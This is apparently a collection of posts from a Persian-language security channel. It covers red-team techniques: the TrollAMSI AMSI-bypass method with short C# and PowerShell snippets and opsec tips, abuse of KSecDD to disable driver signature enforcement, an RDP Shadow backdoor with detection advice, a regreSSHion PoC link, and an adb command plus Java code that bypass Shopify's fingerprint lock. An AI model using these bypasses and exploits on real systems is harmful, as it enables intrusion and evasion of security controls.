Security Analysis

⭕️ Android Malware with Fake Extension(PDF) in Whatsapp در این حمله نفوذگر توسط دستکاری کردن و تغییر نام اکستنشن نمایشی در صفحه چت واتساپ اهداف خود، بدافزار اندرویدی با فرمت apk را با اکستنشن نمایشی pdf در واتساپ برای قربانیان خود ارسال کرده و قربانیان با فرض بر pdf بودن فایل ارسالی، بدافزار را نصب کرده و دیوایس شان آلوده میگردد. #Android #Malware @Securation

‏⭕️ اسکریپتی به جهت مانیتور کردن تغییرات Active Directory به صورت RealTime بدون دریافت تمام Object ها توسعه داده شده که، از Replication Metadata ها و Update Sequence Number یا USN برای فیلتر کردن Object ها استفاده میکند. این پروژه برگرفته از LDAP Monitor است. به سوییچ های این ابزار و نحوه استفاده از آن میپردازیم:

Parameters DC - domain controller FQDN. Formatlist - output in list instead of table. ExcludelastLogonTimestamp - exclude lastLogonTimestamp events from output DumpAllObjects - dump all active directory before start. In case of changes It will show you all previous values. But in large domains use it on your own risk (time and resource consuming). Short - in output will be only AttributeName, AttributeValue, LastOriginChangeTime and Explanation. Output - create XML file with all output. ExcludeObjectGUID - exclude Active Directory object with specific GUID. Sleep - time interval between requests for USN number. By default - 30 seconds. USN - specify started USN. DisplayXML - display previous captured XML file. How to use Domain computer Just run module in powershell session from domain user. For better performance use domain controller FQDN instead of IP address. Non-domain computer Start powershell session with domain user with runas. Check that domain controller accessible. For better performance use domain controller FQDN instead of IP address.

#RedTeam #BlueTeam @securation

‏⭕️ در سال 2016 محققی به اسم Matt Greabers تکنیکی برای دور زدن AMSI ایجاد کرد به اسم Reflection، زمانی که این تکنیک را با Method Swapping ترکیب کنیم اصطلاحا MonkeyPatching نیز گفته میشود. حال به توضیح قسمتی از این تکنیک اشاره میکنیم:

There is a low detection surface: statically: because the code profile is so short and it is hard to apply a signature on any part of the common .NET functionality used dynmically: because of the lack of hooked win32 API calls Because we are modifying JIT/IL memory which is hard for AV/EDR to monitor or has not been monitored at this point by a lot of vendors ! For some security products, modify method M to pass in empty argument string c. ! For CSHARP example, private static int M(string c, string s) { c = ""; return 1; } ! For POWERSHELL example, class TrollAMSI{static [int] M([string]$c, [string]$s){ $c = ""; return 1}} ! Refer to TrollAMSIdotnet for amsi bypass for Assembly.Load() Benefits No P/Invoke or win32 API calls used such as VirtualProtect hence more opsec safe No amsi.dll patching or byte patching for that matter

‏ ‏در ادامه نکاتی را برای رعایت OpSec میتوان اشاره کرد:

STATIC: obfuscate "AmsiUtils" and "ScanContent" maybe? DYNAMIC: Nothing much really. Note that Add-Type method will leave disk artifacts, whereas hosting the compiled DLL on a webserver and using Load() is completely in memory

https://github.com/cybersectroll/TrollAMSI/tree/main #RedTeam #AMSI @securation

#DWORD #CPL1 📣 ثبت نام دوره دوم آموزش زبان برنامه نویسی C | سطح مقدماتی و متوسط ◀️با محوریت مهندسی معکوس و برنامه نویسی امن ✈️مشخصات دوره : ⬅️سطح دوره : مقدماتی و متوسط ⬅️تعداد ساعت دوره : 25 ساعت ⬅️نحوه برگزاری : آفلاین ( ویدیو های رکورد شده + پلیر اختصاصی ) ⬅️زبان دوره : فارسی و انگلیسی ⬅️تعداد سر فصل : 25 ⬅️ارزیابی و مدرک پایان دوره : دارد ⬅️گروه پشتیبانی : دارد ✈️نکات کلیدی دوره : ⬅️آموزش پیشنیاز های لازم و مفاهیم برنامه نویسی ⬅️شامل استاندارد های ANSI C تا C17 ⬅️کد نویسی در محیط های برنامه نویسی Visual Studio و Visual Studio Code ⬅️کد نویسی در سیستم عامل های ویندوز و لینوکس ⬅️ساخت برنامه های Cross-Platform ⬅️کار با ابزار های CMake و Automake ⬅️آموزش به صورت پروژه محور و بررسی خلاصه محتوای هر بخش در پایان آن ⬅️حل سوالات مربوط به مصاحبه های کاری و  مرور کردن مطالب در انتهای دوره ⬅️جلسات آنلاین رفع اشکال و پرسش و پاسخ ⬅️مناسب برای تمامی گرایش های نیازمند به زبان برنامه نویسی C ◀️در این دوره فرض بر این گرفته شده که زبان C به عنوان اولین زبانی است که قصد یادگیری آن را دارید. به همین دلیل، تمامی پیش‌نیازها به طور کامل توضیح داده شده‌اند و تمامی بخش‌ها به ریز و با نکات کاربردی بیان شده‌اند. در هر مرحله از دوره، مفاهیم با جزئیات توضیح داده شده و با مثال‌های عملی و تمرین‌های متنوع پشتیبانی می‌شوند تا یادگیری به بهترین شکل ممکن انجام شود. هدف این است که شما بتوانید با اعتماد به نفس و درک عمیق، برنامه‌نویسی به زبان C را آغاز کنید. 🎁 طبق روال همیشگی، دانشجویان سایر دوره های آکادمی DWORD از تخفیف برخوردار خواهند بود. 🎁 در صورت تمایل به شرکت در دوره و پرداخت شهریه به صورت اقساط با مدرس دوره در ارتباط باشید. ✈️ مشاهده اطلاعات کامل دوره، سرفصل و ثبت نام 🎤 ارتباط با مدرس دوره ▶️ پلی لیست ویدیو های دمو دوره 🦅 کانال بایت امن | گروه بایت امن _

‏⭕️ اگر عمیق تر به معماری امنیتی و احراز هویت در سرویس مایکروسافت رجوع کرده باشید متوجه خواهید شد که مسئولیت تمامی احراز هویت ها و تعامل آن ها با هم با SSPI یا Security Support Provider Interface است. این معماری که به طوری نوعی از WinApi ها هم است، در دو سطح User-Mode و Kernel-Mode است، در سطح کرنل از درایوری به اسم KSecDD.sys استفاده میشود. با بررسی بیشتر متوجه میشویم عملیات IOCTL_KSEC_IPC_SET_FUNCTION_RETURN در KSSPI دسترسی lSASS به اجرای دستور به صورت دلخواه در آدرس های سطح کرنل ایجاد میکند. همچنین باید اشاره کرد با شروع فرایند lsass.exe!LsapOpenKsec پروسه LSASS را فراخوانی میکند و با استفاده از عملیات IOCTL_KSEC_CONNECT_LSA خود را به این رابط متصل می کند. از این نقطه به بعد، هیچ فرآیند دیگری نمی تواند به اینترفیس متصل شود و بنابراین منطقا فقط توسط LSASS راه اندازی می شود. حال با این توضیحات ما دسترسی آن را داریم که ویژگی Driver Signature Enforcement را غیر فعال کنیم و Unsigned kernel drivers های خود را بدون مشکل Load کنیم. https://tierzerosecurity.co.nz/2024/04/29/kexecdd.html #RedTeam #RootKit #Evasion @securation

⭕️ آسیب پذیری جدید به نام regreSSHion روی OpenSSH کشف شده که به هکرها اجازه اجرای کد از راه دور را میدهد. شماره CVE ثبت شده CVE-2024-6387 که تحلیل این آسیب پذیری رو میتونید اینجا بخونید. در ایران بالای 85 هزار سرور آسیب پذیر به این آسیب پذیری RCE وجود داره لطفا اطلاع رسانی کنید. https://www.qualys.com/regresshion-cve-2024-6387/ Poc : https://github.com/zgzhang/cve-2024-6387-poc/blob/main/7etsuo-regreSSHion.c @securation

‏⭕️ یکی از ویژگی هایی که توی مراحل RedTeam به کار میاد و شاید کمتر کسی بهش بربخوره اینشکلی هست که ، فرض کنید سیستم ها ویژگی RDP بر روی آنها فعال است، اما پورت مربوط به آن توسط فایروال مسدود باشد و پورت SMB یعنی 445 در دسترس باشد ، با استفاده از RDP Shadow این امکان را داریم از این طریق به هدف دسترسی RDP داشته باشیم به طوری که فرد متوجه نشود. با پرداختن به این مقاله ، تکنیک های Persistence و Backdoor با این روش و تکنیک های OpSec مورد استفاده در آن را متوجه میشویم. در آخر برای شناسایی این تکنیک میتوان مشخص کرد اگر مقدار Shadow در کلید:

HKLM\Software\Policies\Microsoft\Windows NT\Terminal Services

ایجاد یا تغییر کرد هشدار داده شود. همچنین برای امن سازی آن میتوان به موارد زیر اشاره نمود:

To prevent shadowing altogether, using application whitelisting, it is possible to block the RdpSaUacHelper.exe, RdpSaProxy.exe and RdpSa.exe processes from launching In the group policy, one can explicitly set the Shadow setting to require the user’s consent before shadowing or controlling the session so the backdoor is less effective; this assumes that an attacker at a later moment does not have sufficient privileges anymore to set the Shadow key in the registry to the value of their liking The WINSTATION_SHADOW permission can be removed from all entries in the Win32_TSAccount WMI class, although an attacker with administrative permissions can provide themselves this permission again

#RedTeam #RDP @securation

⭕️Bypass of biometrics security functionality (FingerPrint) of Shopify using DeepLink Exploit using ADB:

adb shell am start -n com.shopify.mobile/com.shopify.mobile.lib.app.DeepLinkActivity -d 'https://www.shopify.com/admin/products'

Exploit using Java Code:

Intent intent = new Intent();
intent.setClassName("com.shopify.mobile", "com.shopify.mobile.lib.app.DeepLinkActivity");
intent.setData(Uri.parse("https://www.shopify.com/admin/products")); 
startActivity(intent);

https://hackerone.com/reports/637194 #Android @Securation

List of type annotation challenges for python language. لیستی از سوالات مرتبط با سیستم type annotation در زبان پایتون که احتمالا قبلا بهشون برخورد نکرده بودید. #python #type #annotation #challenge #practice #exercise @pythony https://python-type-challenges.zeabur.app

‏⭕️پروژه پایتونی توسعه داده شده است که به جهت ایجاد Socks Proxy با IP Source های به صورت رندوم، با استفاده از تکنیک Round Robin، به صورت SSH Tunnels یا حالت های دیگر مورد استفاده است. از مواردی که در آن مفید هست این ابزار، میتوان به WAF Bypass، Password Spraying ، Web scraping اشاره نمود. توضیحات تکمیلی درباره عملکرد این ابزار:

TREVORproxy has two modes of operation: a Subnet Proxy and an SSH Proxy: Subnet Proxy mode uses the AnyIP feature of the Linux kernel to assign an entire subnet to your network interface, and give every connection a random source IP address from that subnet. E.g. if your cloud provider gives you a /64 IPv6 range, you can send your traffic from over eighteen quintillion (18,446,744,073,709,551,616) unique IP addresses. SSH Proxy mode combines iptables with SSH's SOCKS proxy feature (ssh -D) to round-robin packets through remote systems (cloud VMs, etc.) NOTE: TREVORproxy is not intended as a DoS tool, as it does not "spoof" packets. It is a fully-functioning SOCKS proxy, meaning that it is designed to accept return traffic.

#RedTeam #OpSec @securation